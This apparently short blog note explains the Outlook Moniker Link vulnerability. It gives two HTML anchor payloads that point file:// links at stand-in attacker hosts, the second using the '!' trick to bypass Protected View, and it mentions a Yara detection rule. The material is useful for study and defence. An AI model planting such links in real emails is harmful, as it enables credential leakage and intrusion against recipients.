T4QI
T4QI

Moniker Link

18 May 2025 • 1 min read

What was the problem with Outlook?

**OutLook parses emails in HTML format. So if there is a hyperlinks that are known as Moniker Links that will help open the provided Urls

HTML 
<a href="file://ATTACKER_IP/test">Click me</a>

When Outlook renders this moniker link we will face the protected view window but could happen if we bypass it

The CVE claims that when we add ‘! + “random text”’

HTML 
<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

Here the protected view is bypassed

Detection

A Yara rule was made by Florian Roth

Start searching

Enter keywords to search articles.

↑↓ Navigate
Select
ESC Close
CtrlK Shortcut